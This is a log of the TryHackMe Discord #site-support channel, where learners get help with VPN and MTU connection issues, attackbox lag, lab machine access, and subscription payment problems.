#site-support
1 messages · Page 265 of 1
I do network services and i'm at task enumerating FTP, now i scan idk why i see 1 port and the anwser is wrong 🙂
It should be more than 1. Try again, maybe you scanned it too quick and everything wasn't done initiating?
Huh. Restart the machine?
i need help with the attackbox
its lagging way too much
i cant even open terminal
Maybe you use OpenVPN
that good to sovle that
Okay
Yo
I'm trying to do Beginner pathway/further nmap
the practical task
But when I run an Xmas scan on the machine IP it says host is down
I'm connected to the VPN too
EDIT: Nvm I figured it out -Pn flag worked
Can someone help me? I want to change my username. Can anyone help me with the process of changing the username?
Literally just googled it @granite tapir
Email support@tryhackme.com with the following details Old username New username Reason for change
Hi team, my VM has been in conversion limbo for the last 12 hours. Is this normal? Any of the staff members perhaps have the ability to check if it is actually still converting? It is a Windows Server 2019 image and the size was roughly 5Gb.
@late river Thanks
Gave +1 Rep to @late river
So you solve it?
Hey (: we’re aware of issues with converting and are working on a fix we speak. I think the ETA was approx Tuesday
Perfect thanks!
Gave +1 Rep to @zealous yoke
Hey there! My kali box has the network icon stuck on loading infinitely. Config is a bridged connection on vmware. Trying switching between configs and restarting, but nothing gives. Would appreciate any help!
this is tech support for TryHackMe, try asking in #general or #infosec-general
Is the site having issues?
Webpage doesn't seem to be loading for me(could just be my internet too tho).
The room page loads for me. 🙂
okay, thanks
guys when i press view site on intro tutorial i cant view site its just blank is it site malfunction or just my pc trash
it appears for a second and dissapears
Try a different browser?
tried and worked thanks
Cool
What's the issue?
Let's take it to #infosec-general. This is for THM tech support specifically
Oh okay
In the OWASP ZAP section of the web fundamentals path, when I do an auto scan on the DVWA sever I get an insane amount of critical threat warnings from bitdefender. is this a regular issue with OWASP and/or the DVWA servers?
Anyone here??
Need help!!
Uhh no. You doing this from a Windows machine? Can you use a VM?
I think i have connected to vpn or other proxy somehow and i really want to disable but i can't detect any thing
So is there a way that i could track where i have enabled??
You ran the OpenVPN script? Can you browse to 10.10.10.10?
I can't browse it
I just cant loging to any id just frausted
Just a sec let me check
drop a screenshot of what specifically?
Where should i do?
The terminal where you opened the connection. The scan you ran. The BitDefender warnings. Any of the above.
Are you using a Linux machine?
No
What are you using?
Win
Kali is really a better option. But Windows is doable. Though you won't be able to do a lot of the rooms using it.
Is your VM in NAT or Bridged mode? Under Network.
NAT
Try Bridged
is that a terminal command?
No, in the VM settings.
Pretty sure it's a requirement
anything else I should change/select?
Don't think so.
awesome ty so much
No worries.
Any reason why using RDP for the attackbox is very laggy? Its usable in the browser based version.
It's lag because your browser, and sometime by your internet
Its pretty good in the browser, but unusable through RDP
Yes, you think the browser run 2 VM @.@ that so many
I think it laggy by that
❯ ping vnc.tryhackme.tech
PING vnc.tryhackme.tech (54.220.229.192): 56 data bytes
64 bytes from 54.220.229.192: icmp_seq=0 ttl=26 time=299.851 ms
64 bytes from 54.220.229.192: icmp_seq=1 ttl=26 time=298.684 ms
64 bytes from 54.220.229.192: icmp_seq=2 ttl=26 time=298.987 ms
64 bytes from 54.220.229.192: icmp_seq=3 ttl=26 time=304.487 ms
64 bytes from 54.220.229.192: icmp_seq=4 ttl=26 time=299.651 ms
^C
--- vnc.tryhackme.tech ping statistics ---
5 packets transmitted, 5 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 298.684/300.332/304.487/2.121 ms
apparently vnc.tryhackme.tech is in eu-west-1 hence the RTT ~300ms (i'm based in Sydney)
All Attackboxes are deployed in Ireland
Do you know if we will ever have the option to choose the location? Similar to the OpenVPN server location? 🙂
I do not:)
is there a certain browser that the attack box works better in? any other tips to reduce lag?
Hi, the server in my room is not responding to my nmap. I'm connected to openvpn. I terminated the server and started a new one. Still having the same issue.
ping response 44 packets transmitted, 0 received, 100% packet loss, time 44021ms
pn didn't work eighter
why do i have pink letters ??
I changed the vpn server to us west and it worked
Congrats
there may be an issue with us east
Hi am having issues seeing the images for the task on Network Service tasks for SMB. Can anyone share the IP to access the SMB to complete the questions? Any solutions to the images displaying broken on a chrome browser and Safari?
It seems it’s a constant issue. Based on previous post people have posted. Is tryhackme working on fixing this?
Ahh. Okay is it best to skip this module not sure if it will cause issue with the future module if I skip the SMB now. How soon for this to get fixed?
I don't recall any of those images that don't show having some information that is being needed to finish the tasks. I finished everything until Exploiting FTP without any problems. Those are just some icons you don't need them for any tasks...
There is ~3GB of stuff in /usr/share/wordlists on the Kali machine. Is this available for download anywhere or shall I just SCP it to my own machine?
I don’t know what IP address I need to run the SMB cmd to finish task 4, starting questions 3 -8. I can’t connect to the host when I run the command using the IP giving in question 1.
Hmm you need to connect to the IP from the machine that you started in Task 3 if i remember correctly, not on the IP that you are given in the first question of Task 4, that's just an example of how the command should look like...
I only have my machine IP and a IP giving in Task 4 first question. I don't see where an IP was shared in task 3. Unless the images show the IP buts it's broken.
It's hard for me to understand how did you end up in Task 4 without starting the machine in Task 3 because they are connected and you need information from Task 3 to complete Task 4.
Now go to Task 3 and click the Start Machine Green button in the right of the start of the Task..
I used my machine IP
Show me a print screen of the place where you got the IP address, but to do that you need to verify with the discord bot first.
!docs verify
Follow this link
Let's move to the #room-help channel @bronze talon because this channels purpose is different from your problem, show me the print screen there and i will reply
got it
Is this the right place to ask about streaks? I have COVID and it’s kicking my butt. I want to see if I could get a freeze on my streak for a bit til I’m better.
Drop me an email when you feel better with your THM username + Streak value and I will reset it for you:)
Thank you very much. You guys are awesome! I'm just glad I took the vaccine. Hopefully I'll be back at it soon.
Gave +1 Rep to @bronze vale
This has probably been asked before, but does anyone know how to change the country of their profile?
Anybody else have the issue of not being able to ssh when connected with OpenVPN? I am using Kali Linux in VMware. I am connected with my ovpn file and can nmap, and ping, but I can't ssh in
Depends on what you're trying to ssh into
can i postpone my premium, till i finish my college exams ?
@bronze vale
and I would like to ask, when will TCP vpn be supported ?
cuz am from "Egypt" and its kind of blocked for UDP
Nvm, found out that you could just visit http://tryhackme.com/api/user/update-timezone
was trying to ssh into one of the boxes I got credentials for but it just hangs. found a post about changing mtu for the vpn to 1200 instead of 1500 and it worked
@pulsar patrol I'm having kind of similar issues with netcat and trying to do a shell. Whenever I run nc and try and listen nothing pops up
@marsh plinth are you using the IP address for the VPN?
indeed
i thought at first it might have been wrong IP but i switched it to that and it worked
I wonder if it's my AV
or ISP
that's weird
I just subscribed and see these walkthrough videos. They're amazing! I love that I can speed it up (I love doing that when learning), but are there any plans to add Closed Captioning?
getting a 'permission denied' when using the default pw for linuxfund2
Any ideas?
Ah, machine had not fully loaded.
Your subscription will renew on: 16/02/2022
My question is, if I cancel the subscription, Would I lost the current premium plan ?
hello
One of my friend wants to get the thm subscription but since he doesnt have a credit card ot paypal so how he can get the subscription ??
I think that you can buy vouchers from the site for him if you can of course and after get the actual money from him, or directly pay with your card and get the money after.
Can't think of other way around it...
thank you so much
Gave +1 Rep to @eager fulcrum
Aloha there, Mr.robot room is soo slow, any known issue with that room? or could someone have a look?
i have reported it in #room-bugs few weeks ago.
any reply?
nope
Hi, is there any info on when the rooms Graylog, Suricata and OpenEDR will be ready in Security Operations & Monitoring module? Tnx.
Hello guys can I have a special tickets for a special private question … ?
I’m french and I come to ask for help here because this is the last solution I have
What you mean with special ticket? As long as your question is related to a technical THM question, you can and should just ask straight away in here. If it's a room related question use #room-help or #room-hints and if it's not related to THM at all use #general or #infosec-general 🙂
yes it's not related to THM but rather with its community because I'm looking for people ready to help me because I got scammed 1 year ago
Okay, well although I'm not sure how you expect someone to help you with such a matter, as nobody will do anything illegal nor being the police, you could still try to ask in #general or #infosec-general 🙂
Hello, where can I get some help with connection problem? I've use https://github.com/tryhackme/openvpn-troubleshooting , and it said I needed to ask for help here.
even if it's a redirection to other people or some info that I manage to get info with what they left as traces
You might want to start with a screenshot of the output openvpn produces when you try to connect to the thm vpn. You will have to verify first in order to send screenshots.
!docs verify
If you do ip a s do you see only a tun0 interface or any extra like tun1, tun2 etc? I guess you do see more
tun0 and tun1 are here
So in case you do, use sudo killall openvpn then connect to the thm vpn again, wait a minute and do ip a s again to check if you now only got a tun0 interface or still any extra.
ok. Now I have only 1 tun0 interface, but ./thm-troubleshoot still shows me an error.
What are you trying to connect to, beside the troubleshoot script issue ?
generaly I always have problems with reaching http in various thm rooms(rarely ssh). I am in wreath network now, and I can't reach 10000 port in first machine.
If you understood the question correctly.
You could try sudo ip link set dev tun0 mtu 1200 and then check again if it's solving the issue
lol, It is working now.
Thank you so much. Will I need to run this command every time I start wm?
Yes, but you could also alter the wreath.ovpn file to make it set the mtu to 1200 itself
I see. Thanks again. You are amazing!
Have a nice day.
I’ve sent THM a couple of mails, and haven’t got a single answer. Could a staff member help me? 🙏🏼
according to THM staff, every time you send another email, your previous email goes to the bottom of the list... but maybe state your issue
Hi, my issue is, that i would like to get a student discount for Premium, hence that im a student. And it does not show on the site automatic. Would be grateful with some help 🙂
I've been unable to access machines in the holo network the past hour, whether it's from my kali or the provided attackbox. Not even ping works, it just returns Destination Host Unreachable Any clues?
How's your VPN connection?
Not seeing any errors there
Finally managed to access one of the hosts.
..Only for my connection to immediately hang
Try regenerating your config file for Holo
did that earlier
Might be something with the network then. Check #holo-network . I believe there were some issues last week
Posted there too earlier. Now I'm seeing some restarts on my vpn and then I can access the machine again (for a minute)
2022-01-17 09:59:57 [server] Inactivity timeout (--ping-restart), restarting
2022-01-17 09:59:57 SIGUSR1[soft,ping-restart] received, process restarting
2022-01-17 09:59:57 Restart pause, 5 second(s)
Hi, can anybody help me with the Burpsuite updation problem?
What part are you stuck on?
I downloaded the latest JAR file, renamed the downloaded file and changed its mode to +x. Later I moved it to the /usr/bin folder. Then i checked the file type it was an deflate file, which i unzipped. But the problem here is that, it unzipped to a new folder named 'burp', and i dont know what to do with it. There are no proper 'burpsuite' labelled executables in that newly unzipped folder.
I watched a few youtube videos from which i did all these steps, but their burpsuite was updated and i am stuck with a zip archive file. i tried googling it... but, couldnt find a satisfactory solution.
Hi Alex; I downloaded the JAR file -> renamed it to burpsuite -> changed it to executable(chmod +x) -> moved the file to /usr/bin -> removed the previous file that was there -> tried to execute not working -> "invalid file (bad magic number): Exec format error" popped up -> i unzipped the JAR file
Can you link the room/task please?
am using my own machine
@eager fulcrum
The bot is drunk
Don't blame 'em
I am experiencing problems with the "Subscribe Now" buttons for Premium in both Edge and Chrome. Anyone else?
When trying to install OpenVPN in Kali Linux VM - it prompts for a password in terminal, but will not allow me to type any password. Please advise!
- Kali comes with openvpn installed.
- It lets you type it, it does not show you that you're typing. This is to avoid showing people snooping how long your password is etc etc
- Please keep this channel to site and directly tryhackme related issues, and use #infosec-general if you're having Linux troubles
Thank you. Is the PW the same as my user login to kali linux ?
Try it
My room broke.
Completed the rpnessusredux room.
Then it decided it wasn't done.
I went back to look at it again.
It states that Task 2 (the installation guide) is incomplete.
All buttons show competed and are unclickable.
Did you refresh the page?
Full refresh a couple times. (Once after I tried manually making some buttons clickable 😄 )
Try resetting the room and entering the answers again
That seems to have fixed it.
Whhop!~
Hello,
is it the right place to inform you that there is a dead link on a THM room ?
"
https://tryhackme.com/room/googledorking
Task 3
Enter: Search Engine Optimisation
the dead link :
http://googledorking.cmnatic.co.uk
"
if it's not the right place, i liked the information of where it is ;
Thank you for everything.
That got bug 🙂
#room-bugs message
ok 🙂 thanks for the answer
yes but I also dont have a credit card
I am still having issues with my attackbox launching.. the only error message I get is failed to connect to server
Well unfortunately i can't think of another way, for online shopping you kind of need a card or a voucher or something, don't think there is another way around it...
Wait a couple of minutes and then try ctrl + F5 for a hard refresh of the page
I have an issue where I am trying to pay through paypal, but it doesn't give me any errors, it accepts the transaction and then nothing happens on both my paypal account and my tryhackme account, I have limited time to study every day and I can't go on without the subscription, I tried to make the purchase on different browsers and still nothing
Maybe try to reach out to paypal and ask them if they can see any transaction attempt or know why it didn't work. If they can't see anything you might want to send an email to THM support. But reaching out to paypal first might be the fastest.
both these option will probably take hours to days to get any answers if a solution at all, but yeah it's a good idea
managed to speak with paypal, they are saying i should talk to THM 🤷♂️
hey guys i want to add vpn in settings vpn can any of you help me ???
in here
Why don't you want to use the CLI?
mess
Mess? Sorry, then...
i sometime us ctrl + c
just use `sudo openvpn <username>.ovpn&' to background it
the & at the end starts it as a process
Why? You can keep the terminal that has the OpenVPN in a different workspace if it bothers you that much
to cancel the command 2 3 time and my alt + tab have some problem
Just open a terminal in Workspace 2 and run it there and do all you other work in Workspace 1
If you import the config file to the NM GUI, you won't have access to the rest of the web
Go to "Import Saved Config File..." and import it.
not working like that
web frezz
If you haven't managed to import, how do you know how it works or not?!
i imported it like you said but when i start it browser stop working
Go from there on...
ya thats how i did
What stoped?
The browser does not open???
unable to surf
OK. So your browser works.
Again: If you import it as YOU want, you won't be able to surf.
If you run it in a terminal, you will be able to surf.
that way its working
When you import it, then you are limited to THM rooms.
I am telling you
Good luck
Hi I'd like to change my username on the platform so that I can keep the same name across all my socials and github and add the profile to my resume. I don't see a way to do it on my own though.. How can I change my username?
Here: #site-support message
Lately I've been having a problem with THM.. I have Kali installed as a VM, and i would use OpenVPN to connect. For the last few days, I haven't been able to connect to the individual rooms. For the first few days I was able to connect to THM and ping Google, but when I would run the troubleshooting script, it would say I'm not connected to the Internet. Today when I tried, it says I'm fully connected, but I still can't access the machines in the room. I tried updating/upgrading in the terminal, going back to a known good configuration, and I tried changing the MTU to 1200 and I'm still having the same problems
Are you using the GUI to connect to the vpn or you run openvpn from the terminal ?
Terminal
Could you post a screenshot of the output openvpn produces when connecting ? You will have to verify in order to send screenshots.
!docs verify
Can you open 10.10.10.10 in your machines browser ?
Yes
And which room you can't access the machine?
All of them specifically hack park
So you have that target machine up right now ? If yes, let me have the target machine IP pls
10.10.106.181
Do you have the MTU set to 1200 at the moment ?
If not, do sudo ip link set dev tun0 mtu 1200
Yes
If you check ip a s do you only see a tun0 interface or any extra like tun1, tun2 etc ?
No only tun0
And openvpn is only running inside your VM and not on your host machine as well ?
Yes
Could you try sudo ip link set dev tun0 mtu 900 and then check again?
Still didn’t work
What's the error you are getting when trying to access the page ?
I can’t ping it and whenever I try to access the website that would be associated with that machine I can’t access it
And what is the error you are getting when accessing the page? To ping a machine is not reliable to check.
Ok I can access it via browser. I think changing the MTU helped
Just so you know to not have any issues in the future. If you don't receive a reply to ping, it doesn't mean there has to be something wrong. Especially windows machine most of the time do not reply to ICMP pings, so that's why it's not reliable to verify if the machine is up or if you are able to connect to it.
Thanks I appreciate it
Gave +1 Rep to @crystal marlin
i do have a debit card but only credit is accepted in thm
Your card is not supported for this currency.
its showing me this
hmm i payed with a debit card, maybe it's because of the currency you have the card in, maybe try paypal?
https://tryhackme.com/room/hamlet isn't working properly. I cannot get the ftp to respond properly and the login page isn't loading. Is there a way to reset the machine? I understand that it should take some time but I'm not the only one having the issue and this is the 3rd vpn configuration I go through and I waited 15 minutes at least each time. Only the main page and the text for the wordlist are loading.
@crystal marlin I will definitely try it when I am studying again. It happens every time that I try it but hopefully this will work
Hello i'm doing the Attacktive directory room : https://tryhackme.com/room/attacktivedirectory#
and they ask us to install bloodhound and neo4j on the virtual machine, but when i try it sait: unable to locate package. I'v done a apt uptade && apt ugradre but still not working. How can i do to fix it ? because we need those later in the room
might be because the machine does not have internet access
for free users up ^ but bloodhound and neo4j are already installed on the attackbox (:
Gave +1 Rep to @zealous yoke
@modern oasis 👋
that paypal button pops-up the whole paypal app where you can choose from the cards/credit on your paypal account
let me share the ss
sure
that probably means that you've selected the option to add a card or that your account doesn't have a card already
OR that you don't have paypal credit awarded to you as a payment method
Yah i dont have card. But i have credit. I want to use credit here
I used credit in other sites who accepting paypal
Like this
mhhm could be a regional thing maybe
I think maybe asking paypal directly would be best in this case
I am not getting this page, let me use VPN
This is going from https://tryhackme.com/why-subscribe -> subscription plan -> select paypal checkout from the pop-up and then that window opens
I remember someone saying it's a setting for the merchant
Is paypal balance definitely enabled?
Does "PayPal Credit" here mean something eg Klarna where they offer you credit?
PayPal credit is paypal's answer to the credit card
so you get given a set amount based on eligibility and then you pay off a minimum or full balance every month
Yeah, not to be confused with a PayPal balance which I think is happening here
Paypal credit is defo accepted by THM, I've used it very recently (:
ah yeah that might be the confusion
you'll need to add a card (it's a paypal thing) to pay even if it comes out of your paypal balance
@modern oasis
😦 i don't have card that support international payment.
Assuming you have enough paypal balance, it'll come all out of your paypal balance and not touch the card. I think the card requirement in that case is just a fraud prevention measure from paypal
I think a month ago, i tried it. It was giving me option to use my balance.. But don't know why it doesn't showing me now when i need it.
anyway, i will try to sort it out. Thanks for your help
Gave +1 Rep to @zealous yoke
No worries, hope that helps somewhat. Best advice I could give is to ask paypal directly (: they'll have access to more about your account then anyone here and at THM 😄
THM defo supports paypal credit, cards, etc
balance is a paypal-specific thingy
Sure, i will contact paypal team
GL 😄
anyone present can help with this issue?
hi, do you use anything that could be blocking domains? adblock, privacy scripts or even things like PiHoles?
negative
some adblock policies etc block our payment gateway which is chargebee.com
I literally just paid for a subscription via paypal within the last 10 mins
could you try and look at your browsers developer/debug consoel?
I tried on different browsers as well
there may not be any visible errors like pop-ups but could be in the developers logs
oh interesting
let me check
i get these errors just by opening the page(not purchasing anything)
DevTools failed to load source map: Could not load content for https://assets.tryhackme.com/css/utils/introjs.min.css.map: HTTP error: status code 403, net::ERR_HTTP_RESPONSE_CODE_FAILURE DevTools failed to load source map: Could not load content for https://assets.tryhackme.com/js/popper.min.js.map: HTTP error: status code 403, net::ERR_HTTP_RESPONSE_CODE_FAILURE DevTools failed to load source map: Could not load content for https://assets.tryhackme.com/css/bootstrap.min.css.map: HTTP error: status code 403, net::ERR_HTTP_RESPONSE_CODE_FAILURE
ill try to make a purchase and see which errors i might get
got these errors after opening the purchase window
``
js?key=AIzaSyBk5SBUDNAHLqGVy-dtSDCea_JhHRtYacc&libraries=places&callback=mapsLoaded:337 [Report Only] Refused to connect to 'https://maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true' because it violates the following Content Security Policy directive: "connect-src https://sentry.io/api/ 'self' https://www.paypal.com".
_.n.send @ js?key=AIzaSyBk5SBUDNAHLqGVy-dtSDCea_JhHRtYacc&libraries=places&callback=mapsLoaded:337
zea @ js?key=AIzaSyBk5SBUDNAHLqGVy-dtSDCea_JhHRtYacc&libraries=places&callback=mapsLoaded:199
Bea @ js?key=AIzaSyBk5SBUDNAHLqGVy-dtSDCea_JhHRtYacc&libraries=places&callback=mapsLoaded:194
google.maps.Load @ js?key=AIzaSyBk5SBUDNAHLqGVy-dtSDCea_JhHRtYacc&libraries=places&callback=mapsLoaded:14
(anonymous) @ js?key=AIzaSyBk5SBUDNAHLqGVy-dtSDCea_JhHRtYacc&libraries=places&callback=mapsLoaded:338
(anonymous) @ js?key=AIzaSyBk5SBUDNAHLqGVy-dtSDCea_JhHRtYacc&libraries=places&callback=mapsLoaded:338
js?key=AIzaSyBk5SBUDNAHLqGVy-dtSDCea_JhHRtYacc&libraries=places&callback=mapsLoaded:337 POST https://sentry.io/api/1730274/security/?sentry_key=2a316e48969b4ea09a575c9de5b08f09 429 (Too Many Requests)
_.n.send @ js?key=AIzaSyBk5SBUDNAHLqGVy-dtSDCea_JhHRtYacc&libraries=places&callback=mapsLoaded:337
zea @ js?key=AIzaSyBk5SBUDNAHLqGVy-dtSDCea_JhHRtYacc&libraries=places&callback=mapsLoaded:199
Bea @ js?key=AIzaSyBk5SBUDNAHLqGVy-dtSDCea_JhHRtYacc&libraries=places&callback=mapsLoaded:194
google.maps.Load @ js?key=AIzaSyBk5SBUDNAHLqGVy-dtSDCea_JhHRtYacc&libraries=places&callback=mapsLoaded:14
(anonymous) @ js?key=AIzaSyBk5SBUDNAHLqGVy-dtSDCea_JhHRtYacc&libraries=places&callback=mapsLoaded:338
(anonymous) @ js?key=AIzaSyBk5SBUDNAHLqGVy-dtSDCea_JhHRtYacc&libraries=places&callback=mapsLoaded:338 ``
ah interesting
hope im not spamming the chat, i can put it in a .txt file if you wish
the last ones are anyway the assets.thm assets aren't
mhhm lemme ask the software guys about this ((:
alright thank you 🙂
Okie dokie so that error I can replicate but was also able to subscribe
so I've asked for a bit of advice on this
want me to try to purchase once more?
Suppose you can do, just check that you aren't say being double-charged (I mean we can refund it but that's a different process)
alright ill try
and you're 10000% sure you don't have extensions like ablock running?
got this error when switching to the paypal option:
could you maybe share w/e extensions that you use? maybe trying to subscribe via incognito would be a good test (as extensions don't load)
[Report Only] Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'nonce-DlACgNghap4CQ7ZIg1Qz1iVPn7g=' 'self' https://maps.googleapis.com https://www.google.com/recaptcha/ https://tryhackme.chargebeestatic.com http://dgkxwewtzsnml.cloudfront.net/static/app-static-assets/hp/hp-7.4.2/ https://core.spreedly.com https://js.chargebee.com/v2/ https://js1.chargebee.com/v2/ https://js.stripe.com https://www.paypalobjects.com https://www.paypal.com". Either the 'unsafe-inline' keyword, a hash ('sha256-6UjTMctmhk38SzYW5Wggf6yrdhprh/M0mTizwnEELl8='), or a nonce ('nonce-...') is required to enable inline execution.
ill try
sure thanks (:
@zealous yoke
I think it is not problem with paypal, i can use my balance in namecheap.com, which is accepting paypal. I can see option to use my balance there.
It seems to have worked 🙂
via using incognito/private browsing mode?
mhhm okies. I'd probably say it's worth talking to paypal. I know I had the option to use paypal balance but it could be account-specific or some other factor that PayPal dictates
yes indeed :), thank you so much for the help ♥♥♥
Gave +1 Rep to @zealous yoke
awesome! ty for subscribing (:
Gave +1 Rep to @unborn fable
just ttriple-check with your bank/paypal that you weren't over-charged as you tried it a few times
if you were over-charged, email your username, paypal email & the receipts (should have all the necessary info on itanyways) to support@tryhackme.com
I will thank you 🙂

hey guys i would like some help connecting my kali vm into THM vpn
i tried use the normal way with Openvpn but u still couldn't connect so i used the tool from github
it connected first time but i couldnt use the rooms and when i downloaded another config and try again i get this error
cant post pic but it says something went wrong
done now for my issue ?
Ask. Don't ask to ask, just ask. Someone will answer.
Hi guys, i am new here and i got a question? When i open my attackbox it ask for a update with sudo apt update but it ask for a password and i don’t know the password. Thanks Abraham
So post the screenshot of your issue ?
You sure you are on the attackbox ? Maybe verify in order to be able to send a screenshot and then send that
!docs verify
Bet you could set up a script to respond to every message with canned responses (verify with !docs verify, restart the task machine, make sure you're using the task IP, make sure LHOST is your IP, make sure your VPN is connected) and that would solve like 90% of the issues that come through.
Hello Abraham, you shouldn't be asked for a password because the attackbox user is already root
however you can get the password for the root account from https://tryhackme.com/my-machine
or set one yourself via passwd
So regarding to the screenshot you sent me, you are not on the attackbox. That is the linux fundamentals target machine, there is no need (and not even possible as it has no internet connection) for an update on that machine to solve the tasks.
Oke strange, but how can i go further on without the password. Sorry guys for the questions but i’m new with this.
Just follow along the tasks, as far as I know there is no need for a password to solve these tasks
@crystal marlin yeah that is what i also thought but now there asking for it.
Which task and which question are you doing that requires a password ?
@zealous yoke Thanks i am trying it now with your link.
Gave +1 Rep to @zealous yoke
Fontaene is on the right lines, I thought you were talking about the attackbox as that is what you said
but it sounds like you're getting confused with the actual attackbox and the machine that is specific in the room
@crystal marlin i started my machine with Linux fundamentals part 1 task 3
the machine that you deploy from the "Start Machine" button is not the attackbox
and in this case, you do not need to 1) do a sudo update (it's just asking you because of the age but it's just a polite request) and 2) need to know any password other than the "tryhackme" user that is already provided in the room (:
@zealous yoke yeah i already tried tryhackme but it didn’t work
So just to make sure, you are still trying to solve the tasks of https://tryhackme.com/room/linuxfundamentalspart1 ? Or you switched to a different room?
@crystal marlin yes i am still at Linux fundamentals part 1
Then pls let me know for which task you need a password? As you are already on the machine you are supposed to be in order to solve that room. Task 3 doesn't require a password as it's just telling you to deploy the target machine, which you did.
Yeah the last time i didn’t ask for a password @crystal marlin
all good i fixed it thanks
Gave +1 Rep to @crystal marlin
The list of available updates is more then a week old. To check for new updates run sudo apt update. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your internet connection or proxy settings. This is What i see in my screen
Yes
that's just a polite request because of the age of the machine
it is not necessary to do
And how can i go further without it
(and you can't do)
you go with what the tasks instructs you
ignore that the message you posted exists
it doesn't interfere with what you're doing
it's just the system saying "hey I'm a little bit old"
an advisory as it were

I'd really recommend looking at the videos in the room if you're struggling @naive dust
Thanks @crystal marlin @zealous yoke
Gave +1 Rep to @crystal marlin
I am back now
+rep @zealous yoke 😄
Gave +1 Rep to @zealous yoke
There are no stupid questions, so all good 🙂
🙌 @crystal marlin
all good Abraham (: welcome to the site/community
Thanks bro 🙌 @zealous yoke
are there some hikups with the THM servers ? keep losing my connection 😅
Hi, you're the first to report it if so. What is it thats disconnecting? Your VPN, the in-browser stuff? they're all very different
I see no performance issues with the VPN servers atm
oke i will restart the vm then, if i ping the box it will stop after a min or 2 and then after a couple of minutes it continuous
and than it stops again etc
im connected with my own kali machine on EU-VIP2
but if there are no problems on your site i will look further on mine !👍 "thnx for the feedback anyway 🙂
sounds like you are running multiple VPN sessions @lapis glacier
if it isn't that you don't have an unstable internet connection atm
could you post the results of a ping test perhaps?
Looks like it works to me.
you mean it will still work with the errors?
I mean the green information lines say:
cURL Installed.
DOM Installed.
Job finished successfully! Please Restart RED HAWK.
after restart, it shows the same error messages
this error msgs
Although I'm not quite sure if this is related to THM. First running sudo apt update and then sudo apt install php-curl worked flawless for me.
I did that earlier. The second command returns unable to locate package
but let me try again
If you refer to your screenshot, you used php5-curl
same result as earlier
that was another procedure i was following from google
Have you changed your repositories at all?
Do you have that in your /etc/apt/sources.list deb http://http.kali.org/kali kali-rolling main contrib non-free ?
I don't think so. It is a new vm i created for ZTH CyberSecurity Course so i haven't made any changes to it
I have no idea what that is. I'm a newbie
how do i check that?
Just go to that file I provided and check it. /etc/apt/sources.list
Mh, then I'm unsure. But you have internet access on your machine, right ?
yep
sudo apt upgrade would return error if my vm has no access to the internet, right?
nvm.. the firefox browser works so yes i have internet access
Mh, not sure then, if I had to guess I would say there is something with your connection not working properly.
im in tryhack me and can start the attack box but it wont start the machine
tutorial machine is broke
Hey guys, had any one ever tried to upload ova image to create room on tryhackme. Well i uploaded my images like 1 hour or 2 hour ago and it still says converting
Yeah, I uploaded 2 VMs yesterday and this morning it's still converting.
there is only option to enter the card number no paypal
https://tryhackme.chargebeeportal.com/portal/v2/login?forward=portal_main
Login to this link, click Payment Methods / Add New / PayPal
Great thank you mate
Gave +1 Rep to @light vale
no worries
I'm trying to access attack box but after its loaded it shows me white screen with message "vnc.tryhackme.tech took too long to respond." can anyone help me?
Good day I'm learning cyber security and doing web application security. I'm trying to do a task where I'm suppose to guess a password. Problem I'm having us that I can't view the information in the right about bookface and I have tried to drag the window and it's not helping. What else can I do?
Maybe try to close it and start it again? Close browser change browser etc?
sure let me try
I tried but it shows same
what else can i do?
Hmm i tried it also now to see if it's a general thing and it seems that mine is not loading either, so i think that it's a general problem, let's wait and see maybe some of the more experienced users of this discord have an idea of what could be happening...
okay
Maybe add what room your are doing, what task you are doing. Even best would be to add a screenshot of your issue. For that you would have to verify first in order to be able to send sccreenshots.
!docs verify
Solved it meanwhile ?
no not yet
Do you have the attackbox still open ?
ya
its showing me white screen
"vnc.tryhackme.tech took too long to respond." with this message
Mine started working just tried it again...
yep i just tried it again it worked
Hello, I submitted a room on THM. It was rejected and the feedback said * Unfortunately, we don't accept machines from different platforms without consent from the content creator. Thanks -briskets 1/2/21*. Well the machine is on vulnhub and I am the creator. Some help?
Can I ask a question about something serious?
You'll need to prove that it is your room, you should be able to reply.
Reply where?
I think you would have more success addressing this question in #general or #infosec-general channels, i suggets deleting it from here and post it there, this channel has a totally different purpose...
To the message you've received if you can't, I'll try my best to raise it.
Didn’t get any messages, only the note on the room feedback
Okay well, I've raised it, just be patient for them to get back to you :)
Thank you
Gave +1 Rep to @marsh magnet
Hi #site-support team
My name is Sumit Das,
My tryhackme username is sumitdas
I'm a B.tech Computer Science Engineering Student but my university doesn't provide a student email address, what will I do for a student discount?
!docs student
Trying to do the CTF Vol1 room and when I download the file it is not coming up within the attack box, any tips?
I am doing the Splunk 101 room and I get a different answer on task 6 question 1...
hi , i'm subscribe with mail edu But in the past 4 months I have to pay 10 dollars a month. Is there any policy to support me?
Question 2 works fine.
!docs student
!docs openvpn
!docs vpn
you need to verify before you can send a screenshot
!docs verify
this has instructions
!vpn might help you
Have you tried switch servers?
Could be a temporary issue with that endpoint.
i tried eu1, eu2, eu vip
switching servers may be a good idea, but i'd also suggest trying inside a linux vm
alright
Yeah I've never heard of more than 1 server being an issue 😄
i installed kali after enabling the windows subsystem
just because the VM being useful to you in the long run as well
oh yeah, WSL and WSL2 aren't great
my pc is a 6gb ram, running vm was painful
i had a mac w bootable usb
but it broke recently
Also. Ewww OpenVPN Connect.
Visit this page to download the latest version of the open source VPN, OpenVPN.
wait... you're a subscriber, you know you can use the attackbox right?
its laggy....
OpenVPN and OpenVPN Connect aren't the same.
Like, I think it should still work.
But I've never had luck with it 😉
Used OpenVPN and sat on the mailing support list since probably 2007.
ah fair enough then. figured it might solve your vm lag issues 🙂
school network?
Might find that is why you can't connect.
if you can get things to install at all then maybe? but i know that nmap only kinda works with WSL2, and doesn't work at all on WSL
networking and WSL is uh... a pain
i see
Yeah, if you go with the WSL route, you'll find you're best split between Windows native versions of tools, and some Linux tools where those don't work.
i will just use the attackbox then
Which will make asking for help if you need it difficult only because you'll be unique 😄
Before I go into any tangents. @cyan tartan may I DM you?
yes pls
Trying to do the CTF Vol1 room and when I download the file it is not coming up within the attack box, any tips?
I live in the middle east and i'm able to connect
We got him connected. Confirmed and verified it is a censorship firewall blocking him.
but yea openvpn is blocked
Oh 👀 I guess he lives in a different part then
What I'm wondering is if its OpenVPN as a protocol they're monitoring, or just the default 1194 port.
But I'd need to talk to Muiri, and get someone who is blocked to do testing.
that's good to hear though
ahh well I wish I could be of help haha
No worries. I used to work with an anti-censorship company, and used to help a few JSF folks with that stuff. So its a topic that is near and dear.
